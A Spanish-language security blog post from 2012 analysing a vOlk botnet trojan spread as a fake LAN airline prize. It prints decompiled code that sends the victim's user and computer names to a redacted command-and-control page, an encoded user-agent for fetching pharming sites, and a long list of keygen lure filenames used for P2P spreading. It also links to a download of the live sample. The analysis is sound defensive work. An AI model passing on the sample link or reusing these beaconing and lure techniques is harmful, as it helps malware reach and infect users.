lunes, 11 de junio de 2012

Premio LAN - Troyano vOlk Botnet




Otro troyano de la familia vOlk enviado como un falso premio de la Aerolínea LAN.





Icono.


Análisis en VT




El malware esta ofuscado con un VBCrypt.








Aquí desempaquetado, nos descubre un programa compilado en Visual Basic.




Visualización de los C&C




c_40958D: LitVarStr var_BC, "Zombies.php?iName="
  loc_409592: AddVar var_CC
  loc_409596: LitVarStr var_DC, "USERNAME"
  loc_40959B: FStVarCopyObj var_EC
  loc_40959E: FLdRfVar var_EC
  loc_4095A1: FLdRfVar var_FC
  loc_4095A4: ImpAdCallFPR4 Environ
  loc_4095A9: FLdRfVar var_FC
  loc_4095AC: AddVar var_10C
  loc_4095B0: LitI4 &H2D
  loc_4095B5: FLdRfVar var_11C
  loc_4095B8: ImpAdCallFPR4 arg_1 = arg_3 & Chr(arg_2)
  loc_4095BD: FLdRfVar var_11C
  loc_4095C0: ConcatVar var_12C
  loc_4095C4: LitVarStr var_13C, "COMPUTERNAME"




Como se conectara:

http://xxxxxx.com/System/Zombies.php



Nos conectamos a unos de los servidores C&C y pasando el user agent, que esta en el cuerpo del troyano, nos dará los sitios de pharming





User-Agent.

c_4091C1: LitStr "QfH205c3Msk2+mAVLjb6Tgb6S4/9QfPqblc5LDgsSIQuQfPq05c3MsgsS2J6S41zKiT=+iHNMiTaOxu60/CC"


Sitios de Pharming:







Algunas cadenas interesantes, con la intención de infectar recursos compartidos p2p.

 LitStr "Spread USB/P2P Successful"

c_40A946: LitStr "Adobe Acrobat 9 Keygen, Adobe Photoshop CS4 Keygen, Adobe Photoshop CS5 Keygen"
  loc_40A949: LitStr "Adobe Photoshop CS5 Extended Keygen, Adobe Photoshop Elements 9.0 Keygen"
  loc_40A94C: ConcatStr
  loc_40A94D: FStStrNoPop var_D0
  loc_40A950: LitStr "Aiseesoft DVD Ripper 5.0.22-Lz0 Keygen,Aiseesoft Total Video Converter (v5.1.1.10) Keygen"
  loc_40A953: ConcatStr
  loc_40A954: FStStrNoPop var_D4
  loc_40A957: LitStr "Akvis ArtSuite 6.5.2121 Keygen,WinRAR 3.93 Keygen,Virtual DJ Home 7.0 Keygen"
  loc_40A95A: ConcatStr
  loc_40A95B: FStStrNoPop var_D8
  loc_40A95E: LitStr "Alcohol 120" & Chr(37) & " 1.9.8.7612,Alcohol 120" & Chr(37) & " 2.0.1.2033,AnyDVD HD 6.6.0.3 Keygen"
  loc_40A961: ConcatStr
  loc_40A962: FStStrNoPop var_DC
  loc_40A965: LitStr "Patch Windows 7,Aqualux Deluxe Keygen,Microsoft Office 2007 Professional Keygen "
  loc_40A968: ConcatStr
  loc_40A969: FStStrNoPop var_E0
  loc_40A96C: LitStr "Malwarebytes Anti-Malware Keygen,Ashampoo Burning Studio Keygen,Ashampoo Movie Menu Keygen"
  loc_40A96F: ConcatStr
  loc_40A970: FStStrNoPop var_F4
  loc_40A973: LitStr "Assasins Creed 2 (2010),Ashampoo Snap 4 4.1 Keygen,TuneUp Utilities Keygen ,Audio Edit Magic 7.6.0.34 Keygen"
  loc_40A976: ConcatStr
  loc_40A977: FStStrNoPop var_F8
  loc_40A97A: LitStr "Auto Hide IP Keygen,Autodesk AutoCAD 2010 Keygen,Autodesk Mudbox 2011 (x64)Keygen,Autodesk Maya Unlimited 2011"
  loc_40A97D: ConcatStr
  loc_40A97E: FStStrNoPop var_FC
  loc_40A981: LitStr "Autodesk Sketchbook Designer 2011 Keygen,Internet Download Manager 5.19 Keygen,AV Voice Changer Gold 7.0.22"
  loc_40A984: ConcatStr
  loc_40A985: FStStrNoPop var_100
  loc_40A988: LitStr "Avast AntiVirus 4 8,Avast Internet Security 5.0.545 Keygen,Avast! Pro Antivirus 5.0.677 Keygen"
  loc_40A98B: ConcatStr
  loc_40A98C: FStStrNoPop var_104
  loc_40A98F: LitStr "Nero 9 Reloaded (9.4.26.0,AVG Anti-Virus Free Edition 2011,AVG Anti-Virus Pro 9.0 Keygen"
  loc_40A992: ConcatStr
  loc_40A993: FStStrNoPop var_108
  loc_40A996: LitStr "AVG Internet Security 2011 Keygen,Kaspersky All version Activation Key"
  loc_40A999: ConcatStr
  loc_40A99A: FStStrNoPop var_10C
  loc_40A99D: LitStr "AVG PC Tuneup 2011 10.0.0.20,Hex Workshop v6 Keygen,HyperCam 2 Full Keygen"
  loc_40A9A0: ConcatStr
  loc_40A9A1: FStStrNoPop var_110
  loc_40A9A4: LitStr "Avira AntiVir Premium 10.0.0.601 Keygen,Nero Multimedia Suite 10.0.13200 Keygen"
  loc_40A9A7: ConcatStr
  loc_40A9A8: FStStrNoPop var_114
  loc_40A9AB: LitStr "Award Keylogger 1.30 (x86-x64),Backgammon HD 1.4.0 (iPhone),Battlefield 2 (2010)"
  loc_40A9AE: ConcatStr
  loc_40A9AF: FStStrNoPop var_118
  loc_40A9B2: LitStr "BitTorrent 7.1.22502 (Portable),Blu-ray to DVD II Pro 2.80 Keygen,Call of Duty Patch"
  loc_40A9B5: ConcatStr
  loc_40A9B6: FStStrNoPop var_11C
  loc_40A9B9: LitStr "Call of Duty 4 Modern Warfare Patch,Call of Juarez Bound In Blood Patch,Camtasia Studio 7.1.0.1631"
  loc_40A9BC: ConcatStr
  loc_40A9BD: FStStrNoPop var_120
  loc_40A9C0: LitStr "Convert Genius 3.6.0.36 Keygen,WinZip 14.0.8708  Keygen,CorelDraw 10.412"
  loc_40A9C3: ConcatStr
  loc_40A9C4: FStStrNoPop var_124
  loc_40A9C7: LitStr "CorelDRAW 10 10.410 Keygen,CorelDraw Graphics Suite X3 Keygen,Counter Strike 1.6"
  loc_40A9CA: ConcatStr
  loc_40A9CB: FStStrNoPop var_128
  loc_40A9CE: LitStr "Counter Strike 1.6 Non Steam Patch,Counter Strike Source Patch,Kaspersky Internet Security Keygen"







Muestra con y sin pack. :http://www.mediafire.com/?cbjy7tu9935kft5




Add:



Aquí esta el panel de la Botnet.







Eso es todo por el momento.

@Dkavalanche            2012



2 comentarios:

paola dijo...

estaría re bueno poder ganar un viaje a miami, pero es lógico que es mentira cuando el mail no llega a la casilla de correo. Hoy en dia ni siquiera confió en las publicidades que vienen por debajo de los apartamentos en buenos aires salvo que sean expensas para pagar

@Dkavalanche dijo...

Ojala los usuarios de Internet tomaran el recaudo necesario, como lo haces tu. Lastima que muchos caen en este tipo de trampa.
Gracias por comentar.

Android: BankBot. Hace un tiempo se filtro el fuente de un Bankbo t para android y se masifico bastante, creo que muchos lo han lanzado pa...